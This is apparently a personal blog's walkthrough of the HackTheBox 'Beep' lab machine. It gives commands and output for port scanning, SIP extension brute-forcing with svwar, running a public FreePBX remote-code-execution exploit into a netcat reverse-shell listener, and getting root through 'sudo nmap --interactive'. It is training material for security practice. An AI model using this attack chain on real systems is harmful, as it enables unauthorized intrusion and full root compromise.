Post

Beep

Walkthrough of the Beep machine – Elastix/FreePBX enumeration, SIP extension bruteforcing with svwar, remote code execution via a public exploit, and sudo NOPASSWD nmap privilege escalation.

# Beep - HackTheBox Writeup

Beep is an Easy Linux machine on HackTheBox. It focuses on enumerating an Elastix/FreePBX VoIP server, brute-forcing valid SIP extensions, exploiting a known FreePBX remote code execution vulnerability, and escalating privileges through a sudo NOPASSWD misconfiguration on nmap.

Difficulty: Easy
Operating System: Linux
Themes: SIP Enumeration, FreePBX/Elastix RCE, Sudo Misconfig


## Reconnaissance

### Initial Port Scanning

Port Scan:

1
  nmap -sT -p- --min-rate 1000 10.129.229.183

Findings:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
  PORT      STATE SERVICE
  22/tcp    open  ssh
  25/tcp    open  smtp
  80/tcp    open  http
  110/tcp   open  pop3
  111/tcp   open  rpcbind
  143/tcp   open  imap
  443/tcp   open  https
  857/tcp   open  unknown
  993/tcp   open  imaps
  995/tcp   open  pop3s
  3306/tcp  open  mysql
  4190/tcp  open  sieve
  4445/tcp  open  upnotifyp
  4559/tcp  open  hylafax
  5038/tcp  open  unknown
  10000/tcp open  snet-sensor-mgmt

A wide spread of services: SSH, SMTP, HTTP/HTTPS, POP3, RPC, IMAP, MySQL, and more — worth digging deeper on the key ones.

### Deep Port Scanning

1
  nmap -sCV -p 22,25,80,110,111,143,443,993,995,3306 10.129.229.183

Findings:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
  PORT     STATE SERVICE  VERSION
  22/tcp   open  ssh      OpenSSH 4.3 (protocol 2.0)
  25/tcp   open  smtp?
  80/tcp   open  http     Apache httpd 2.2.3
  |_http-title: Did not follow redirect to https://10.129.229.183/
  |_http-server-header: Apache/2.2.3 (CentOS)
  110/tcp  open  pop3?
  111/tcp  open  rpcbind  2 (RPC #100000)
  143/tcp  open  imap?
  443/tcp  open  ssl/http Apache httpd 2.2.3 ((CentOS))
  |_http-title: Elastix - Login page
  993/tcp  open  imaps?
  995/tcp  open  pop3s?
  3306/tcp open  mysql?

Old OpenSSH (4.3) and Apache 2.2.3 on CentOS, with port 443 pointing to an Elastix login page.


## Web Enumeration

The web app on port 443 is an Elastix login page. I tried a handful of common credentials without success, so I moved to enumerating the app structure with dirsearch:

1
  dirsearch -u http://10.129.229.183 -w /usr/share/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -e txt,php -t 50

This surfaced an /admin directory worth investigating further.


## Initial Access

Browsing to /admin revealed the FreePBX version running underneath Elastix. alt text

FreePBX is a free, web-based GUI used to control and manage Asterisk,which an open-source telephony and VoIP server engine.

With the version in hand, I checked Exploit-DB via searchsploit:

1
  searchsploit freepbx

alt text

This returned a remote code execution exploit matching the running version. I copied the script locally and set the target IP, my IP, and listening port. The exploit also required a valid SIP extension number to work.

alt text

### Finding a Valid Extension

Elastix/FreePBX runs on SIP (Session Initiation Protocol), used to start, manage, and end real-time communication sessions. Each extension on the PBX represents a user or endpoint, and probing it with a SIP request can reveal whether it’s valid:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
  SIP PBX
    │
    ├── Extension 100
    ├── Extension 101
    └── Extension 102
            │
            ▼
      SIP Request
            │
            ▼
      SIP Response
            │
            ▼
      Extension Status

I used svwar to brute-force extensions in the 100–999 range via the INVITE method:

1
  svwar -m INVITE -e100-999 10.129.229.183

Result (relevant entry):

1
2
3
4
5
  +-----------+----------------+
  | Extension | Authentication |
  +===========+================+
  | 233       | reqauth        |
  +-----------+----------------+

Extension 233 responded with reqauth, marking it as a valid, registered extension — the rest returned weird and weren’t usable.

### Getting a Shell

With a valid extension, I set the exploit script’s rhost, lhost, lport, and extension values, started a listener, and ran the script:

1
  nc -nlvp 443
1
  python2 exploit.py
1
2
3
4
  listening on [any] 443 ...
  connect to [10.10.17.196] from (UNKNOWN) [10.129.229.183] 52175
  whoami
  asterisk

Shell obtained as asterisk.


## Privilege Escalation

Enumerating sudo permissions for the current user:

1
  sudo -l
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
  User asterisk may run the following commands on this host:
      (root) NOPASSWD: /sbin/shutdown
      (root) NOPASSWD: /usr/bin/nmap
      (root) NOPASSWD: /usr/bin/yum
      (root) NOPASSWD: /bin/touch
      (root) NOPASSWD: /bin/chmod
      (root) NOPASSWD: /bin/chown
      (root) NOPASSWD: /sbin/service
      (root) NOPASSWD: /sbin/init
      (root) NOPASSWD: /usr/sbin/postmap
      (root) NOPASSWD: /usr/sbin/postfix
      (root) NOPASSWD: /usr/sbin/saslpasswd2
      (root) NOPASSWD: /usr/sbin/hardware_detector
      (root) NOPASSWD: /sbin/chkconfig
      (root) NOPASSWD: /usr/sbin/elastix-helper

nmap can be run as root with no password. This version of nmap ships an interactive mode that can break out to a shell — a well-known GTFOBins technique:

1
  sudo nmap --interactive
1
2
3
4
5
  Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
  Welcome to Interactive Mode -- press h <enter> for help
  nmap> !/bin/bash
  whoami
  root

Root shell obtained. Solved – happy hacking!

This machine has multiple valid paths to root; I chose this route specifically to learn more about SIP and VoIP exploitation.


Find me online:
• TryHackMe: t4t4r1s
• HackTheBox: t4t4r1s
• LinkedIn: Mustafa Eltayeb
• X: @mustafa_altayeb


This post is licensed under CC BY 4.0 by the author.